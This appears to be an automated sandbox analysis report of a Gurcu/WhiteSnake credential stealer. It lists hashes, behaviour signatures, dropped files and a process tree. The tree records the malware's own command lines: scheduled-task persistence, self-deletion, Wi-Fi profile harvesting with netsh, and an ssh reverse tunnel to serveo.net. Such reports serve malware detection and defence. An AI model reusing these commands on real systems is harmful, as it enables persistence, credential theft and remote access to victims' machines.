Analysis

  • max time kernel
    134s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    06-10-2023 13:20

General

  • Target

    NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe

  • Size

    256KB

  • MD5

    0a32e2ec770c67261df3f3971d517bea

  • SHA1

    4dfbe7f3faa5b30b9f93085572496f055b02c5e0

  • SHA256

    34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8

  • SHA512

    636b88f63c5829686581489f0c7d41cbee2c7d1aa5aed1f0e675c05047c7f515df7a2fdddf86ef47d28e92681a483e33f5f87f5f7cc8a7c475e343afc93fea2d

  • SSDEEP

    6144:/GpIP+Oqum37ZUr6dgZTlp3j9bpf3X/ZZ+W0:GIPvqR7I6dgZTvfnfP0

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 6 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2724
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2832
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2744
        • C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2256
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:2936
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:2952
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:2856
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2020
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:1760
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:1968
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:2616
                      • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                        "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2879 serveo.net
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1932
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {BB67E9D9-0F5B-449E-8C98-F674A1556653} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2496
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe
                    C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe
                    2⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:2260
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1596
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        4⤵
                          PID:2676
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          4⤵
                            PID:2760
                          • C:\Windows\system32\findstr.exe
                            findstr /R /C:"[ ]:[ ]"
                            4⤵
                              PID:1984
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:864
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              4⤵
                                PID:2204
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show networks mode=bssid
                                4⤵
                                  PID:1276
                                • C:\Windows\system32\findstr.exe
                                  findstr "SSID BSSID Signal"
                                  4⤵
                                    PID:2824
                                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                                  "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2879 serveo.net
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2816

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\.ssh\known_hosts

                              Filesize

                              393B

                              MD5

                              18015a60cd12f33648facec1263cfafa

                              SHA1

                              31b7afd9a2dc51bfad694e5772d430fceedbac3f

                              SHA256

                              9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190

                              SHA512

                              fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

                            • C:\Users\Admin\AppData\Local\67f1w63d06\port.dat

                              Filesize

                              4B

                              MD5

                              ec8b57b0be908301f5748fb04b0714c7

                              SHA1

                              5d577568c631e1806ac1285811978d2e1338e318

                              SHA256

                              b4746d5e8a4c2ccd1f3f2c594fa0c10c254d7486f655b81f71967b89a0aa5a2a

                              SHA512

                              5a6e9788e3de67cbfb040dda5638f66b841d8d78be93350a3ff2ad62e61b73d3753a32dd8b584a033ca94d12f9a0c5b71925f435e40c980c68ca1668abf0d203

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe

                              Filesize

                              256KB

                              MD5

                              0a32e2ec770c67261df3f3971d517bea

                              SHA1

                              4dfbe7f3faa5b30b9f93085572496f055b02c5e0

                              SHA256

                              34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8

                              SHA512

                              636b88f63c5829686581489f0c7d41cbee2c7d1aa5aed1f0e675c05047c7f515df7a2fdddf86ef47d28e92681a483e33f5f87f5f7cc8a7c475e343afc93fea2d

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe

                              Filesize

                              256KB

                              MD5

                              0a32e2ec770c67261df3f3971d517bea

                              SHA1

                              4dfbe7f3faa5b30b9f93085572496f055b02c5e0

                              SHA256

                              34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8

                              SHA512

                              636b88f63c5829686581489f0c7d41cbee2c7d1aa5aed1f0e675c05047c7f515df7a2fdddf86ef47d28e92681a483e33f5f87f5f7cc8a7c475e343afc93fea2d

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8exe_JC.exe

                              Filesize

                              256KB

                              MD5

                              0a32e2ec770c67261df3f3971d517bea

                              SHA1

                              4dfbe7f3faa5b30b9f93085572496f055b02c5e0

                              SHA256

                              34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8

                              SHA512

                              636b88f63c5829686581489f0c7d41cbee2c7d1aa5aed1f0e675c05047c7f515df7a2fdddf86ef47d28e92681a483e33f5f87f5f7cc8a7c475e343afc93fea2d

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

                              Filesize

                              914KB

                              MD5

                              d1ce628a81ab779f1e8f7bf7df1bb32c

                              SHA1

                              011c90c704bb4782001d6e6ce1c647bf2bb17e01

                              SHA256

                              2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                              SHA512

                              de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                            • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • \Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

                              Filesize

                              1.5MB

                              MD5

                              79a6e2268dfdba1d94c27f4b17265ff4

                              SHA1

                              b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                              SHA256

                              6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                              SHA512

                              3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                            • memory/2004-2-0x00000000009D0000-0x0000000000A50000-memory.dmp

                              Filesize

                              512KB

                            • memory/2004-5-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2004-0-0x0000000000DC0000-0x0000000000E06000-memory.dmp

                              Filesize

                              280KB

                            • memory/2004-1-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2256-9-0x0000000000D20000-0x0000000000D66000-memory.dmp

                              Filesize

                              280KB

                            • memory/2256-126-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2256-10-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2256-11-0x000000001B440000-0x000000001B4C0000-memory.dmp

                              Filesize

                              512KB

                            • memory/2260-128-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

                              Filesize

                              9.9MB

                            • memory/2260-134-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

                              Filesize

                              9.9MB